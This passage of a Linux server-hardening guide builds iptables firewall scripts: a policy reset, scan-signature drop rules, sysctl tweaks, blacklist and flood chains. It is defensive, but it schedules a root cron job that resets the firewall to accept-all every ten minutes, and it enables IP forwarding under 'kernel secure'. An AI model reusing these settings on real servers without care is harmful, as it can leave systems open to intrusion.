ShareWiz Ultra Secure Server Setup
Firewall Security
Firewall Security
Introduction
A network firewall is a set of rules to allow or deny passage of network traffic, through one or more network devices. A network firewall may also perform more complex tasks, such as network address translation, bandwidth adjustment, provide encrypted tunnels and much more related to network traffic.
The Linux kernel includes the Netfilter subsystem, which is used to manipulate or decide the fate of network traffic headed into or through your server. All modern Linux firewall solutions use this system for packet filtering.
When a packet reaches your server, it will be handed off to the Netfilter subsystem for acceptance, manipulation, or rejection based on the rules supplied to it from userspace.
Different kernel modules and programs are currently used for different protocols; iptables applies to IPv4, ip6tables to IPv6, arptables to ARP, and ebtables as a special for Ethernet frames.
Many frontends are available to simplify the task of managing the firewall, but the primary user interface solution that is covered here are iptables.
Numerous other third-party firewall solutions such as ufw and ShoreWall can be used instead but these are not covered by this guide.
iptables
Sharewiz Implementation of iptables
There are many ways of establishing iptables rules in Linux, but the solution taken is to create bash script which can use things like conditional filtering.
Uninstall ufw (Optional)
Issue the following command:
sudo aptitude remove --purge ufw
This is entirely optional, but as iptables is going to be used solely for managing the filewall then it makes sense to get rid of ufw.
Create the firewall directory
Issue the following command:
sudo mkdir /sharewiz/firewall/
All sharewiz scripts are kept in specific directories within the /sharewiz partition.
Create the firewall reset script
Issue the following command:
sudo vi /sharewiz/firewall/firewall-reset.sh
…add the following content to the file:
#!/bin/bash
#
# Resets all firewall rules
echo "Stopping firewall and allowing everyone..."
#
# Modify the following settings as required:
#
IPTABLES=/sbin/iptables
#
# Reset the default policies in the filter table.
#
$IPTABLES -P INPUT ACCEPT
$IPTABLES -P FORWARD ACCEPT
$IPTABLES -P OUTPUT ACCEPT
#
# Reset the default policies in the nat table.
#
$IPTABLES -t nat -P PREROUTING ACCEPT
$IPTABLES -t nat -P POSTROUTING ACCEPT
$IPTABLES -t nat -P OUTPUT ACCEPT
#
# Reset the default policies in the mangle table.
#
$IPTABLES -t mangle -P PREROUTING ACCEPT
$IPTABLES -t mangle -P POSTROUTING ACCEPT
$IPTABLES -t mangle -P INPUT ACCEPT
$IPTABLES -t mangle -P OUTPUT ACCEPT
$IPTABLES -t mangle -P FORWARD ACCEPT
#
# Flush all the rules in the filter, nat and mangle tables.
#
$IPTABLES -F
$IPTABLES -t nat -F
$IPTABLES -t mangle -F
#
# Erase all chains that are not default in filter, nat and mangle tables.
#
$IPTABLES -X
$IPTABLES -t nat -X
$IPTABLES -t mangle -X
This scripts completely clears the firewall, and changes all policies to ACCEPT so that the system is complete opened up.
Setup a failsafe when initially setting up the firewall
Prevent being locked out with IP table changes.
Issue the following command:
sudo vi /etc/cron.d/firewall-reset-sharewiz
…add the following content to the file:
0,10,20,30,40,50 * * * * root /sharewiz/firewall/firewall-reset.sh
This cron job will flush all firewall rules, every 10 minutes. This is a safety feature that will ensure that we are not locked out of the system by a mistake in the firewall rules.
Once testing has been completed with the firewall, and it is running fine, then this cron job can be removed.
Make the firewall reset cron job executable
Issue the following command:
sudo chmod 755 /etc/cron.d/firewall-reset-sharewiz
Determine network interfaces to firewall
Obtain a list of all network interfaces, by issuing the following command:
sudo ip link show
which should display something like:
1: lo: link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: eth0: link/ether 08:00:27:f2:4b:5d brd ff:ff:ff:ff:ff:ff
3: eth1: link/ether 08:00:27:14:28:ce brd ff:ff:ff:ff:ff:ff
lo exists on all machines and is used for communication between programs running on this machine.
eth0 and eth1 are the interfaces which will need to be firewalled.
Create a script file to configure the firewall
Issue the following command:
sudo vi /sharewiz/firewall/firewall.sh
…and add the following content to the file:
#!/bin/bash
#
# Modify the following settings as required:
#
IPTABLES=/sbin/iptables
#
#
# Internet Interface
INET_IFACE="eth0"
INET_IP="192.168.0.11"
#
# Local Interface Information
LOCAL_IFACE="eth1"
LOCAL_IP="192.168.1.1"
LOCAL_NET="192.168.1.1/24"
LOCAL_BCAST="192.168.1.255"
#
# Localhost Interface
#
LO_IFACE="lo"
LO_IP="127.0.0.1"
#
#
#*********************************************************
# Trusted hosts
#
# Hosts that are auto allowed into the system if WhiteListing
# is allowed.
#
TRUSTED_HOSTS="192.168.0.10"
UNTRUSTED_HOSTS="123.123.123.123,134.134.134.134"
#
#
#*********************************************************
# What to allow
#
# 0=no
# 1=yes
#
ALLOW_DHCP_BROADCAST_IN=0
ALLOW_ICMP_PARAM_PROBLEM_IN=0
ALLOW_CUPS_IN=0
ALLOW_CUPS_OUT=0
ALLOW_DNS_IN=0
ALLOW_DNS_OUT=1
ALLOW_FTP_IN=0
ALLOW_FTP_OUT=0
ALLOW_HTTP_IN=0
ALLOW_HTTP_OUT=1
ALLOW_HTTPS_IN=0
ALLOW_HTTPS_OUT=0
ALLOW_IMAP_IN=0
ALLOW_IMAP_OUT=0
ALLOW_MYSQL_IN=0
ALLOW_MYSQL_OUT=0
ALLOW_NFS_IN=0
ALLOW_NFS_OUT=0
ALLOW_NTP_IN=1
ALLOW_NTP_OUT=1
ALLOW_PING_IN=0
ALLOW_PING_OUT=1
ALLOW_POP3_IN=0
ALLOW_POP3_OUT=0
ALLOW_PRINT_IN=0 # Allow printer port
ALLOW_PRINT_OUT=0 # Allow printer port
ALLOW_SMTP_IN=0 # Do NOT allow unencrypted SMTP! Use SMTPS instead.
ALLOW_SMTP_OUT=0 # Do NOT allow unencrypted SMTP! Use SMTPS instead.
ALLOW_SMTPS_IN=0
ALLOW_SMTPS_OUT=0
ALLOW_SSH_IN=1
ALLOW_SSH_OUT=1
ALLOW_SQUID_IN=0 # SQUID proxy
ALLOW_SQUID_OUT=0 # SQUID proxy
ALLOW_TELNET_IN=0
ALLOW_TELNET_OUT=0
ALLOW_TRACEROUTE_IN=0
ALLOW_TRACEROUTE_OUT=1
ALLOW_XWINDOWS_IN=0
ALLOW_XWINDOWS_OUT=0
ALLOW_XWINDOWS_FONTSERVER_IN=0
ALLOW_XWINDOWS_FONTSERVER_OUT=0
BLOCK_FACEBOOK=0
BLOCK_FLOODS=0
BLOCK_SAMBA_WITHOUT_LOGGING=1
BLOCK_OVERSIZE_ICMP_PACKETS=1
BLOCK_VIRUSES=1
DO_BAD_PACKETS_LAST=0 # Less logging
DO_KERNEL_SECURE=1
DO_LOG_SCANS=0 # if 1 will log well known scans whilst dropping them
DO_MASQUERADE=0 # if 0 will use SNAT / DNAT
DO_QUICK_NTP=0 # if 1 will allow NTP in without any checks
DO_WHITELISTING=0 # Dangerous is made a 1
#
#
#*********************************************************
# Connection limits
#
CONNECTION_MAX=4
CONNECTION_TIMEOUT=60
#
#
#*********************************************************
# Log limit
#
LOG_LEVEL=7
#
#
#*********************************************************
# String Search Algorith
#
STRING_ALGO="bm"
STRING_ALGO2="kmp"
#
#
#*********************************************************
# Flooding limits
#
#
# Limit for SYN-Flood detection
LIMIT_SYN="5/s"
#
# Burst Limit for SYN-Flood detection
LIMIT_SYN_BURST="10"
#
# Overall Limit for Logging in Logging-Chains
LIMIT_LOG="2/s"
#
# Burst Limit for Logging in Logging-Chains
LIMIT_LOG_BURST="10"
#
# Overall Limit for Ping-Flood-Detection
LIMIT_PING="5/s"
#
# Burst Limit for Ping-Flood-Detection
LIMIT_PING_BURST="10"
#
#
#**************************************************
#********** Do not edit beyond this line **********
#**************************************************
#
#
# IP Mask for all IP addresses
UNIVERSE="0.0.0.0/0"
#
# Ports for IRC-Connection-Tracking
PORTS_IRC="6665,6666,6667,6668,6669,7000"
#
# Ports for traceroute
PORTS_TRACEROUTE_SRC="32769:65535"
PORTS_TRACEROUTE_DEST="33434:33523"
#
# Specification of the high unprivileged IP ports.
PORTS_UNPRIV="1024:65535"
#
# Specification of X Window System (TCP)
PORTS_XWIN="6000:6063"
#
#
#*********************************************************
# Delete all existing rules
#
#
$IPTABLES -F
$IPTABLES -t nat -F
$IPTABLES -t mangle -F
$IPTABLES -X
$IPTABLES -t nat -X
$IPTABLES -t mangle -X
#
#
# Set Policies
# By default, drop everything except outgoing traffic
#
$IPTABLES -P INPUT DROP
$IPTABLES -P FORWARD DROP
$IPTABLES -P OUTPUT ACCEPT
#
#
#*********************************************************
#
# Kernel configuration.
# For details see:
# * http://www.securityfocus.com/infocus/1711
# * http://www.linuxgazette.com/issue77/lechnyr.html
# * http://ipsysctl-tutorial.frozentux.net/chunkyhtml/index.html
# * /usr/src/linux/Documentation/filesystems/proc.txt
# * /usr/src/linux/Documentation/networking/ip-sysctl.txt
#
# Save these settings in the /etc/sysctl.conf file to make it permanent
#
#
if [ $DO_KERNEL_SECURE -eq 1 ]
then
# Allow port forwarding - Enable IP NAT in the Linux kernel
#
echo 1 > /proc/sys/net/ipv4/ip_forward
#
#
# Disabling IP Spoofing
#
echo 2 > /proc/sys/net/ipv4/conf/all/rp_filter
#
#
# Enable IP spoofing protection (i.e. source address verification).
# Note: This is special, as it seems to only be enabled if you set
# */all/rp_filter AND */eth0/rp_filter (for example) to 1! Setting only
# */all/rp_filter alone does _not_ suffice, which is pretty counter-intuitive.
#
for i in /proc/sys/net/ipv4/conf/*/rp_filter; do echo 1 > $i; done
#
#
# Protect against SYN flood attacks (see http://cr.yp.to/syncookies.html).
#
echo 1 > /proc/sys/net/ipv4/tcp_syncookies
#
#
# Ignore all incoming ICMP echo requests (i.e. disable ping).
# Usually not a good idea, as some protocols and users need/want this.
# echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all
#
if [ $ALLOW_PING_IN -eq 0 ]
then
echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all
else
echo 0 > /proc/sys/net/ipv4/icmp_echo_ignore_all
fi
#
#
# Don't respond to broadcast pings
# Ignore ICMP echo requests to broadcast/multicast addresses. We do not
# want to participate in smurf (and similar) DoS attacks.
# For details see: http://en.wikipedia.org/wiki/Smurf_attack.
#
if [ $ALLOW_PING_IN -eq 0 ]
then
echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_broadcasts
else
echo 0 > /proc/sys/net/ipv4/icmp_echo_ignore_broadcasts
fi
#
#
# Block source routing
#
echo 0 > /proc/sys/net/ipv4/conf/all/accept_source_route
#
#
# Don't accept source routed packets.
#
for i in /proc/sys/net/ipv4/conf/*/accept_source_route; do echo 0 > $i; done
#
#
# Disable multicast routing. Should not be needed, usually.
# TODO: This throws an "Operation not permitted" error. Why?
# for i in /proc/sys/net/ipv4/conf/*/mc_forwarding; do echo 0 > $i; done
#
#
# Kill timestamps
#
echo 0 > /proc/sys/net/ipv4/tcp_timestamps
#
#
# Kill redirects
#
echo 0 > /proc/sys/net/ipv4/conf/all/accept_redirects
echo 0 > /proc/sys/net/ipv4/conf/all/send_redirects
#
#
# Don't accept or send ICMP redirects.
#
for i in /proc/sys/net/ipv4/conf/*/accept_redirects; do echo 0 > $i; done
for i in /proc/sys/net/ipv4/conf/*/send_redirects; do echo 0 > $i; done
#
#
# Enable secure redirects, i.e. only accept ICMP redirects for gateways
# listed in the default gateway list. Helps against MITM attacks.
#
for i in /proc/sys/net/ipv4/conf/*/secure_redirects; do echo 1 > $i; done
#
#
# Enable bad error message protection
# Don't log invalid responses to broadcast frames, they just clutter the logs.
#
echo 1 > /proc/sys/net/ipv4/icmp_ignore_bogus_error_responses
#
#
# Log martians
#
echo 1 > /proc/sys/net/ipv4/conf/all/log_martians
#
#
# Log packets with impossible addresses.
#
for i in /proc/sys/net/ipv4/conf/*/log_martians; do echo 1 > $i; done
#
#
# Disable bootp_relay. Should not be needed, usually.
#
for i in /proc/sys/net/ipv4/conf/*/bootp_relay; do echo 0 > $i; done
#
#
# Disable proxy_arp. Should not be needed, usually.
#
for i in /proc/sys/net/ipv4/conf/*/proxy_arp; do echo 0 > $i; done
#
#
# TODO: These may mitigate ARP poisoning attacks?
# /proc/sys/net/ipv4/neigh/*/locktime
# /proc/sys/net/ipv4/neigh/*/gc_stale_time
# TODO: Check rest of /usr/src/linux/Documentation/networking/ip-sysctl.txt.
# Are there any security-relevant options I missed? Check especially:
# icmp_ratelimit, icmp_ratemask, icmp_errors_use_inbound_ifaddr, arp_*.
#
#
# Set out local port range
#
#echo "32768 61000" > /proc/sys/net/ipv4/ip_local_port_range
#
#
# Reduce timeouts for DoS protection
#
echo 30 > /proc/sys/net/ipv4/tcp_fin_timeout
#
#
# Other
#
echo 2400 > /proc/sys/net/ipv4/tcp_keepalive_time
echo 0 > /proc/sys/net/ipv4/tcp_window_scaling
echo 0 > /proc/sys/net/ipv4/tcp_sack
#
#
fi
#
#
#*********************************************************
# Create the chains
#
$IPTABLES -N BAD_PACKETS
$IPTABLES -N BAD_TCP_PACKETS
if [ $DO_WHITELISTING -eq 1 ]
then
$IPTABLES -N WHITELIST
fi
$IPTABLES -N PRIVATE_PACKETS
$IPTABLES -N BLACKLIST
if [ $BLOCK_FLOODS -eq 1 ]
then
$IPTABLES -N FLOODS
fi
if [ $BLOCK_VIRUSES -eq 1 ]
then
$IPTABLES -N VIRUS
fi
if [ $DO_LOG_SCANS -eq 1 ]
then
$IPTABLES -N SCANS
fi
$IPTABLES -N ICMP_IN
$IPTABLES -N ICMP_OUT
$IPTABLES -N TCP_IN
$IPTABLES -N TCP_OUT
$IPTABLES -N UDP_IN
$IPTABLES -N UDP_OUT
$IPTABLES -N NO_LOGGING
#
#
#*********************************************************
# Filter BAD packets
#
#------------------------------------------
# For TCP packet check if they are bad.
#
if [ $DO_BAD_PACKETS_LAST -eq 1 ]
then
$IPTABLES -A BAD_PACKETS -p tcp -j BAD_TCP_PACKETS
fi
#
#
#------------------------------------------
# Drop packets received on the external interface
# claiming a source of the local network
#
$IPTABLES -A BAD_PACKETS -p all -i $INET_IFACE -s $LOCAL_NET -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=local-source a=DROP "
$IPTABLES -A BAD_PACKETS -p all -i $INET_IFACE -s $LOCAL_NET -j DROP
#
#
#------------------------------------------
# Drop INVALID packets immediately (not ESTABLISHED, RELATED or NEW)
#
# Note: ICMPv6 Neighbor Discovery packets remain untracked, and will
# always be classified "INVALID" though they are not corrupted or
# thelike. Keep this in mind, and accept them before this rule!
# iptables -A INPUT -p 41 -j ACCEPT
#
$IPTABLES -A BAD_PACKETS -p all -m conntrack --ctstate INVALID -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=invalid a=DROP "
$IPTABLES -A BAD_PACKETS -p all -m conntrack --ctstate INVALID -j DROP
#
#
#------------------------------------------
# Drop packets with incoming fragments.
# This attack results in Linux Server panic resulting in possible data loss.
#
#$IPTABLES -A BAD_PACKETS -p all -f -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=fragmeted a=DROP "
#$IPTABLES -A BAD_PACKETS -p all -f -j DROP
#
#
#------------------------------------------
# For TCP packet check if they are bad.
#
if [ $DO_BAD_PACKETS_LAST -eq 0 ]
then
$IPTABLES -A BAD_PACKETS -p tcp -j BAD_TCP_PACKETS
fi
#
#
#------------------------------------------
# All good, so return
#
$IPTABLES -A BAD_PACKETS -j RETURN
#
#
#*********************************************************
# Filter bad TCP packets
#
# Flags are: SYN ACK FIN RST URG PSH ALL NONE
#
# The only flag that is allowed to be sent along
# with a SYN is ACK, and this only in the 2nd
# packet of the 3-way-handshake.
#
#
#------------------------------------------
# Malformed packets
#
#
$IPTABLES -A BAD_TCP_PACKETS -p tcp --tcp-flags ALL FIN,PSH,URG -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=XMAS-scan a=DROP "
$IPTABLES -A BAD_TCP_PACKETS -p tcp --tcp-flags ALL FIN,PSH,URG -j DROP
#
$IPTABLES -A BAD_TCP_PACKETS -p tcp --tcp-flags ALL SYN,RST,ACK,FIN,URG -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=XMAS-PSH-scan a=DROP "
$IPTABLES -A BAD_TCP_PACKETS -p tcp --tcp-flags ALL SYN,RST,ACK,FIN,URG -j DROP
#
$IPTABLES -A BAD_TCP_PACKETS -p tcp --tcp-flags ALL ALL -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=XMAS-ALL-scan a=DROP "
$IPTABLES -A BAD_TCP_PACKETS -p tcp --tcp-flags ALL ALL -j DROP
#
$IPTABLES -A BAD_TCP_PACKETS -p tcp --tcp-flags ALL FIN -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=FIN-scan a=DROP "
$IPTABLES -A BAD_TCP_PACKETS -p tcp --tcp-flags ALL FIN -j DROP
#
# Sending SYN in conjunction with RST means, that a connection shall
#
$IPTABLES -A BAD_TCP_PACKETS -p tcp --tcp-flags SYN,RST SYN,RST -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=SYN/RST-scan a=DROP "
$IPTABLES -A BAD_TCP_PACKETS -p tcp --tcp-flags SYN,RST SYN,RST -j DROP
#
$IPTABLES -A BAD_TCP_PACKETS -p tcp --tcp-flags SYN,FIN SYN,FIN -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=SYN/FIN-scan a=DROP "
$IPTABLES -A BAD_TCP_PACKETS -p tcp --tcp-flags SYN,FIN SYN,FIN -j DROP
#
$IPTABLES -A BAD_TCP_PACKETS -p tcp --tcp-flags ALL NONE -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=Null-scan a=DROP "
$IPTABLES -A BAD_TCP_PACKETS -p tcp --tcp-flags ALL NONE -j DROP
#
$IPTABLES -A BAD_TCP_PACKETS -p tcp --tcp-flags ALL URG,PSH,SYN,FIN -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=NMAP-ID-scan a=DROP "
$IPTABLES -A BAD_TCP_PACKETS -p tcp --tcp-flags ALL URG,PSH,SYN,FIN -j DROP
#
$IPTABLES -A BAD_TCP_PACKETS -p tcp --tcp-flags FIN,RST FIN,RST -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=BAD_TCP:FIN/RST a=DROP "
$IPTABLES -A BAD_TCP_PACKETS -p tcp --tcp-flags FIN,RST FIN,RST -j DROP
#
# FIN scan, nmap v3.0 sends ACK,FIN FIN
#
$IPTABLES -A BAD_TCP_PACKETS -p tcp --tcp-flags FIN,ACK FIN -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=BAD_TCP:FAF a=DROP "
$IPTABLES -A BAD_TCP_PACKETS -p tcp --tcp-flags FIN,ACK FIN -j DROP
#
$IPTABLES -A BAD_TCP_PACKETS -p tcp --tcp-flags ACK,URG URG -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=BAD_TCP:AUU a=DROP "
$IPTABLES -A BAD_TCP_PACKETS -p tcp --tcp-flags ACK,URG URG -j DROP
#
$IPTABLES -A BAD_TCP_PACKETS -p tcp --tcp-flags ACK,PSH PSH -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=BAD_TCP:APP a=DROP "
$IPTABLES -A BAD_TCP_PACKETS -p tcp --tcp-flags ACK,PSH PSH -j DROP
#
$IPTABLES -A BAD_TCP_PACKETS -p tcp --tcp-flags ACK,FIN FIN -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=BAD_TCP:AFF a=DROP "
$IPTABLES -A BAD_TCP_PACKETS -p tcp --tcp-flags ACK,FIN FIN -j DROP
#
$IPTABLES -A BAD_TCP_PACKETS -p tcp --tcp-flags SYN,URG SYN -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=BAD_TCP:SUS a=DROP "
$IPTABLES -A BAD_TCP_PACKETS -p tcp --tcp-flags SYN,URG SYN -j DROP
#
#
#------------------------------------------
# Unclean packets...same as above (but this option is still listed as experimental)
#
#$IPTABLES -A BAD_TCP_PACKETS -i $INET_IFACE -m unclean -j LOG --log-prefix "pf=BAD_TCP:unclean a=DROP "
#$IPTABLES -A BAD_TCP_PACKETS -i $INET_IFACE -m unclean -j DROP
#
#
#------------------------------------------
# New connections that have no syn set are most probably bad.
# Also known as ACK scan
#
$IPTABLES -A BAD_TCP_PACKETS -p tcp ! --syn -m conntrack --ctstate NEW -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=new-not-syn a=DROP "
$IPTABLES -A BAD_TCP_PACKETS -p tcp ! --syn -m conntrack --ctstate NEW -j DROP
#
$IPTABLES -A BAD_TCP_PACKETS -p tcp ! --tcp-flags SYN,RST,ACK SYN -m conntrack --ctstate NEW -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=new-not-syn2 a=DROP "
$IPTABLES -A BAD_TCP_PACKETS -p tcp ! --tcp-flags SYN,RST,ACK SYN -m conntrack --ctstate NEW -j DROP
#$IPTABLES -A BAD_TCP_PACKETS -p tcp -m tcp ! --tcp-flags SYN,RST,ACK SYN -m state --state NEW -j REJECT --reject-with icmp-net-unreachable
#
#
#------------------------------------------
# Port 0 fingerprint attempt
#
$IPTABLES -A BAD_TCP_PACKETS -p tcp --dport 0 -m limit --limit 1/h --limit-burst 1 -j LOG --log-level $LOG_LEVEL --log-prefix "fp=TCP:finger:0 a=DROP "
$IPTABLES -A BAD_TCP_PACKETS -p tcp --dport 0 -j DROP
#
#
#------------------------------------------
# Invalid TCP Options
#
$IPTABLES -A BAD_TCP_PACKETS -p tcp --tcp-option 64 -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level info --log-prefix "fp=TCP:Bad Flag(64) a=DROP"
$IPTABLES -A BAD_TCP_PACKETS -p tcp --tcp-option 64 -j DROP
#
$IPTABLES -A BAD_TCP_PACKETS -p tcp --tcp-option 128 -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level info --log-prefix "fp=TCP:Bad Flag(128) a=DROP"
$IPTABLES -A BAD_TCP_PACKETS -p tcp --tcp-option 128 -j DROP
#
#
#------------------------------------------
# All good, so return
#
$IPTABLES -A BAD_TCP_PACKETS -p tcp -j RETURN
#
#
#*********************************************************
# Whitelisting
# Always allow these packets
#
#
# High-priority packets which should always be accepted without much
# delay.
#
# Using this chain will break firewall security and will result in
# this not passing certain security standards. However, there may
# be specific reasons where this might be useful.
#
#
#------------------------------------------
if [ $DO_WHITELISTING -eq 1 ]
then
#------------------------------------------
# Allow NTP
# To provide accurate timing, it is necessary to have a low delay
# when processing networking packets of the Network Time Protocol.
#
# These packets are sent as UDP packets to port 123. For this
# reason these packets are directly accepted, without checking
# further rules. These packets might originate from an attacker,
# and even be part of a DDOS attack, but we accept that situation.
# The processing of NTP packets has such a low overhead that even
# when packets are coming in at a very high speed, it wont take too
# much CPU resources. There are also no states preserved as with
# the TCP protocol which could cause buffer overflows. The only
# thing which might happen is saturation of the network, but that
# would happen with a DDOS attack independent of us accepting or
# dropping the incoming packets.
#
if [ $DO_QUICK_NTP -eq 1 ]
then
$IPTABLES -A WHITELIST -p udp -m conntrack --ctstate NEW --dport 123 -j ACCEPT
fi
#
#
#------------------------------------------
# Allow unpriviledged ports
#
#$IPTABLES -A UDP_OUT -p tcp -o $INET_IFACE -s $INET_IP --sport $PORTS_UNPRIV -m conntrack --ctstate NEW -j ACCEPT
#
#
#------------------------------------------
# Add trusted hosts:
#
# The "remove" clears the whitelisted host out of the recently seen
# BLACKLIST table, and because it has an ACCEPT jump target, should
# stop further processing anyway.
#
$IPTABLES -A WHITELIST -s $TRUSTED_HOSTS -m recent --remove --name BLACKLIST -j ACCEPT
#
#
#------------------------------------------
# All good, so return
#
$IPTABLES -A WHITELIST -j RETURN
#
#
#------------------------------------------
fi
#
#
#*********************************************************
# Filter Enemies
#
#
#------------------------------------------
# This will allow three connections from any given IP address
# within a 60 second period, and require 60 seconds of no
# subsequent connection attempts before it will resume allowing
# connections again.
#
# The --rttl option also takes into account the TTL of the
# datagram when matching packets, so as to endeavour to mitigate
# against spoofed source addresses.
#
# Does not not stop any established connections from the host
# that has made too many connections in a short period of time.
#
# Allows for whitelisting.
#
# The Linux kernel will maintain a list of portscan IPs which
# can be accessed at the location /proc/net/ipt_recent/BLACKLIST
#
#iptables -N WHITELIST
$IPTABLES -A BLACKLIST -m conntrack --ctstate NEW -m recent --set --name BLACKLIST
$IPTABLES -A BLACKLIST -m conntrack --ctstate NEW -m recent --name BLACKLIST --update --seconds $CONNECTION_TIMEOUT --hitcount $CONNECTION_MAX --rttl -j LOG --log-level $LOG_LEVEL --log-prefix "fp=BLACKLIST a=DROP "
$IPTABLES -A BLACKLIST -m conntrack --ctstate NEW -m recent --name BLACKLIST --update --seconds $CONNECTION_TIMEOUT --hitcount $CONNECTION_MAX --rttl -j DROP
#
#
#------------------------------------------
# Block any other required ports
#
#$IPTABLES -A BLACKLIST -i ! lo -m tcp -p tcp --dport 1433 -m recent --name BLACKLIST --set -j DROP
#$IPTABLES -A BLACKLIST -i ! lo -m tcp -p tcp --dport 3306 -m recent --name BLACKLIST --set -j DROP
#$IPTABLES -A BLACKLIST -i ! lo -m tcp -p tcp --dport 8086 -m recent --name BLACKLIST --set -j DROP
#$IPTABLES -A BLACKLIST -i ! lo -m tcp -p tcp --dport 10000 -m recent --name BLACKLIST --set -j DROP
#$IPTABLES -A BLACKLIST -s 99.99.99.99 -j DROP
#
#
#------------------------------------------
# Block partizans
#
$IPTABLES -A BLACKLIST -s $UNTRUSTED_HOSTS -j DROP
#
#
#------------------------------------------
# Drop Private Network Address On Public Interface
#
#$IPTABLES -A BLACKLIST -s LOCAL_NET -i INET_IFACE -j LOG --log-level $LOG_LEVEL --log-prefix "fp=INET Addr on Local a=DROP "
#$IPTABLES -A BLACKLIST -s LOCAL_NET -i INET_IFACE -j DROP
#
#
#------------------------------------------
# Block any flooding
#
if [ $BLOCK_FLOODS -eq 1 ]
then
$IPTABLES -A BLACKLIST -j FLOODS
fi
#
#
#------------------------------------------
# Block Viruses
#
if [ $BLOCK_VIRUSES -eq 1 ]
then
$IPTABLES -A BLACKLIST -j VIRUS
fi
#
#
#------------------------------------------
if [ $BLOCK_FACEBOOK -eq 1 ]
then
$IPTABLES -A BLACKLIST -p tcp -m iprange --dst-range 66.220.144.0-66.220.159.255 --dport 443 -j DROP
$IPTABLES -A BLACKLIST -p tcp -m iprange --dst-range 69.63.176.0-69.63.191.255 --dport 443 -j DROP
$IPTABLES -A BLACKLIST -p tcp -m iprange --dst-range 204.15.20.0-204.15.23.255 --dport 443 -j DROP
$IPTABLES -A BLACKLIST -p tcp -m iprange --dst-range 66.220.144.0-66.220.159.255 --dport 80 -j DROP
$IPTABLES -A BLACKLIST -p tcp -m iprange --dst-range 69.63.176.0-69.63.191.255 --dport 80 -j DROP
$IPTABLES -A BLACKLIST -p tcp -m iprange --dst-range 204.15.20.0-204.15.23.255 --dport 80 -j DROP
fi
#
#
#------------------------------------------
# All good, so return
#
$IPTABLES -A BLACKLIST -j RETURN
#
#
#*********************************************************
# Filter Floods
#
#
if [ $BLOCK_FLOODS -eq 1 ]
then
# Allow 4 TCP connects per second, no more
#
#$IPTABLES -A FLOODS -m limit --limit 1/s --limit-burst 4 -j RETURN
#
#------------------------------------------
#
# Block DDOS - SYN-flood
#
$IPTABLES -A FLOODS -p tcp --syn -m connlimit --connlimit-above 9 -j LOG --log-level $LOG_LEVEL --log-prefix "fp=TCP:SYN flood:1 a=DROP "
$IPTABLES -A FLOODS -p tcp --syn -m connlimit --connlimit-above 9 -j DROP
#
#
#------------------------------------------
#
# TCP Flood protection. Accept $LIMIT_PING requests/sec, rest will be logged/dropped.
#
$IPTABLES -A FLOODS -p tcp -m limit --limit $LIMIT_PING --limit-burst $LIMIT_PING_BURST -j RETURN
$IPTABLES -A FLOODS -p tcp -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=TCP-IN:PING-flood a=DROP "
$IPTABLES -A FLOODS -p tcp -m limit -j DROP
#
#
#------------------------------------------
#
# UDP Flood protection. Accept $LIMIT_PING requests/sec, rest will be logged/dropped.
#
$IPTABLES -A FLOODS -p udp -m limit --limit $LIMIT_PING --limit-burst $LIMIT_PING_BURST -j RETURN
$IPTABLES -A FLOODS -p udp -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=UDP-IN:PING-flood a=DROP "
$IPTABLES -A FLOODS -p udp -m limit -j DROP
#
#
#------------------------------------------
#
# TCP Flood protection. Accept $LIMIT_PING requests/sec, rest will be logged/dropped.
# 3 minutes ban for flooders
#
$IPTABLES -A FLOODS -p tcp -m limit --limit 2/s --limit-burst 6 -m comment --comment "fp=Limit TCP rate" -j RETURN
$IPTABLES -A FLOODS -p tcp -m limit --limit 6/h --limit-burst 1 -j LOG --log-prefix "fp=TCP flood:1 a=DROP "
